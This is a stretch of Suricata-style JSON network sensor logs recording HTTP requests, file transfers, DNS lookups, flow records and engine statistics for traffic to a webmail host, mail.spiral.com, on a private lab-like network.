{"timestamp":"2020-02-29T00:04:40.610884+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270}} {"timestamp":"2020-02-29T00:04:45.616045+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} {"timestamp":"2020-02-29T00:04:47.000164+0000","event_type":"stats","stats":{"uptime":13939,"capture":{"kernel_packets":133281,"kernel_drops":0},"decoder":{"pkts":133294,"bytes":92314686,"invalid":181,"ipv4":131853,"ipv6":8,"ethernet":133294,"raw":0,"null":0,"sll":0,"tcp":126782,"udp":4876,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2695,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2711,"synack":2702,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1738,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2223,"failed_udp":109},"tx":{"http":4513,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2300}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24468,"memcap_state":0,"memcap_global":0},"http":{"memuse":40042,"memcap":0}}} {"timestamp":"2020-02-29T00:04:48.000452+0000","flow_id":1881129799098872,"event_type":"flow","src_ip":"192.168.10.122","src_port":42778,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.369144+0000","end":"2020-02-28T23:59:47.734840+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000632+0000","flow_id":623224072413106,"event_type":"flow","src_ip":"192.168.10.122","src_port":37719,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.106418+0000","end":"2020-02-28T23:59:47.331703+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000678+0000","flow_id":2193489897440047,"event_type":"flow","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:02:47.377647+0000","end":"2020-02-29T00:03:47.408351+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:48.000945+0000","flow_id":240989174631820,"event_type":"flow","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":3514,"bytes_toclient":28564,"start":"2020-02-29T00:02:46.724364+0000","end":"2020-02-29T00:03:47.408388+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:50.047903+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32155,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:50.308555+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:04:50.329994+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266}} {"timestamp":"2020-02-29T00:04:53.000550+0000","flow_id":374678625694270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3294,"bytes_toclient":16546,"start":"2020-02-29T00:03:47.569918+0000","end":"2020-02-29T00:03:52.855546+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:53.000773+0000","flow_id":1505212802246177,"event_type":"flow","src_ip":"192.168.10.81","src_port":52674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:03:47.828961+0000","end":"2020-02-29T00:03:52.835319+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:54.000206+0000","event_type":"stats","stats":{"uptime":13946,"capture":{"kernel_packets":133299,"kernel_drops":0},"decoder":{"pkts":133314,"bytes":92322649,"invalid":181,"ipv4":131873,"ipv6":8,"ethernet":133314,"raw":0,"null":0,"sll":0,"tcp":126800,"udp":4878,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":109},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2675,"new_pruned":15,"est_pruned":2260,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24139,"memcap_state":0,"memcap_global":0},"http":{"memuse":56764,"memcap":0}}} {"timestamp":"2020-02-29T00:04:55.334911+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} {"timestamp":"2020-02-29T00:04:56.000454+0000","flow_id":1166765069131310,"event_type":"flow","src_ip":"192.168.10.122","src_port":33141,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:55.351790+0000","end":"2020-02-28T23:59:55.457599+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:57.000258+0000","flow_id":289883071232958,"event_type":"flow","src_ip":"192.168.10.122","src_port":59034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:56.375742+0000","end":"2020-02-28T23:59:56.487105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:59.000659+0000","flow_id":1802819661102183,"event_type":"flow","src_ip":"192.168.10.122","src_port":33902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:58.359527+0000","end":"2020-02-28T23:59:58.464835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:59.384895+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23764,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:59.622045+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683}} {"timestamp":"2020-02-29T00:05:00.000493+0000","flow_id":1754728927280743,"event_type":"flow","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:03:47.409191+0000","end":"2020-02-29T00:03:59.345249+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:01.000179+0000","event_type":"stats","stats":{"uptime":13953,"capture":{"kernel_packets":133316,"kernel_drops":0},"decoder":{"pkts":133318,"bytes":92322961,"invalid":181,"ipv4":131877,"ipv6":8,"ethernet":133318,"raw":0,"null":0,"sll":0,"tcp":126802,"udp":4880,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":110},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2677,"new_pruned":15,"est_pruned":2262,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23478,"memcap_state":0,"memcap_global":0},"http":{"memuse":125401,"memcap":0}}} {"timestamp":"2020-02-29T00:05:02.000756+0000","flow_id":387009461891405,"event_type":"flow","src_ip":"192.168.10.122","src_port":46406,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:00.930125+0000","end":"2020-02-29T00:00:01.041456+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.000230+0000","flow_id":1136275096733977,"event_type":"flow","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:02.592153+0000","end":"2020-02-29T00:00:02.697211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.919178+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41495,"tx_id":0}} {"timestamp":"2020-02-29T00:05:03.934083+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44365,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:04.149827+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174}} {"timestamp":"2020-02-29T00:05:04.179927+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24573,"tx_id":1}} {"timestamp":"2020-02-29T00:05:04.194971+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704}} {"timestamp":"2020-02-29T00:05:04.196998+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2070,"tx_id":2}} {"timestamp":"2020-02-29T00:05:04.222557+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611}} {"timestamp":"2020-02-29T00:05:04.225081+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:05:04.223946+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/list.js","state":"CLOSED","stored":false,"size":1658,"tx_id":3}} {"timestamp":"2020-02-29T00:05:04.224524+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397}} {"timestamp":"2020-02-29T00:05:04.225825+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/mnemo.png","state":"CLOSED","stored":false,"size":397,"tx_id":4}} {"timestamp":"2020-02-29T00:05:04.269330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240}} {"timestamp":"2020-02-29T00:05:04.306330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-000.png","state":"CLOSED","stored":false,"size":240,"tx_id":5}} {"timestamp":"2020-02-29T00:05:04.306764+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:05:05.001844+0000","flow_id":1193329442411942,"event_type":"flow","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:03.906662+0000","end":"2020-02-29T00:00:04.012140+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:06.000219+0000","flow_id":290368418484945,"event_type":"flow","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1083,"bytes_toclient":709,"start":"2020-02-29T00:04:00.070353+0000","end":"2020-02-29T00:04:05.216909+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 